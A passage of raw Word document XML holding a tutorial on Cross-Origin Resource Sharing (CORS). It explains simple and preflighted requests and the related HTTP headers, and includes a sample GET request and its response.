        <w:t> wants to execute AJAX requests to a Web application with domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>mydomain.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> using HTTP.</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Using CORS isn’t so simple especially when you face debugging difficulties. As a matter of fact, CORS can imply an additional OPTIONS request and error messages aren’t so explicit. Most of the time, errors correspond to a lack of required headers from the server. For such reasons, a good understanding of how this feature works is essential.</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CORS is used in a lot of places and use cases. In Web development, it’s often necessary to split the front application from the server application for development reasons or to interact with a remote service.</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The CORS mechanism is mainly implemented with the Web server but this has an impact on the client side if some headers are missing in responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F" w:rsidP="00D7718F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:before="330" w:beforeAutospacing="0" w:after="165" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Understanding CORS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With CORS, the remote Web application (here the one with domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>mydomain.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>) chooses if the request can be served. The CORS specification distinguishes two distinct use cases:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F" w:rsidP="00D7718F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>Simple requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>. This use case applies if we use HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> methods. In the case of POST methods, only content types with the following values are supported: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>text/plain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>multipart/form-data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F" w:rsidP="00D7718F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>Preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>. When the ‘simple requests’ use case doesn’t apply, a first request (with the HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> method) is made to check what can be done in the context of cross-domain requests.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Notice that if you add authentication to the request using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> header, simple requests automatically become </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> ones.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Client and server exchange a set of headers to specify behaviors regarding cross-domain requests. Let’s have a look at them now. We will then describe how they are used in both use cases.</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Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>: this header is used by the client to specify which domain the request is executed from. The server uses this hint to authorize, or not, the cross-domain request.</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Access-Control-Request-Method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>with in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> the context of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> request sends this header to check if the target method is allowed in the context of cross-domain requests.</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Access-Control-Request-Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>with in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> the context of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> request sends this header to check if headers are allowed for the target method in the context of cross-domain requests.</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Access-Control-Allow-Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>: this specifies if credentials are supported for cross-domain requests.</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lastRenderedPageBreak/>
        <w:t>Access-Control-Allow-Methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve">: the server uses this header to tell which headers are authorized in the context of the request. This is typically used in the context of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests.</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Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>: the server uses this header to tell which domains are authorized for the request.</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Access-Control-Allow-Headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve">: the server uses this header to tell which headers are authorized in the context of the request. This is typically used in the context of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F" w:rsidP="00D7718F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:before="300" w:after="165"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Simple requests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Where simple requests are concerned, the request is executed against the other domain. If the remote resource supports cross domains, the response is directly sent back. Otherwise an error occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F" w:rsidP="00D7718F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="364D96"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="28575" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="simple-reques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reques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 cy="9525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Here is a sample content for a cross-domain request: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GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>myresource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>/ HTTP/1.1</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Host:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> mydomain.org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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://test.org/example.html</w:t>
      </w:r>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token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0077AA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>Origin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://test.org</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And the corresponding response:</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0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP/1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="990055"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>200 OK</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Access-Control-Allow-Origin:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</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Content-Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t xml:space="preserve"> application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>[JSON Data]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D7718F" w:rsidRDefault="00D7718F" w:rsidP="00D7718F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:before="300" w:after="165"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests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 xml:space="preserve">In the case of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t>preflighted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests, this corresponds to a negotiation between the caller and the Web application based on HTTP headers. It consists of two phases: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The browser first executes an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
        </w:rPr>
        <w:t>OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="292929"/>
        </w:rPr>
        <w:t> request with the same URL as the target request to check that it has the rights to execute the request. This </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:color w:val="CC2255"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="E8E8E8" w:frame="1"/>
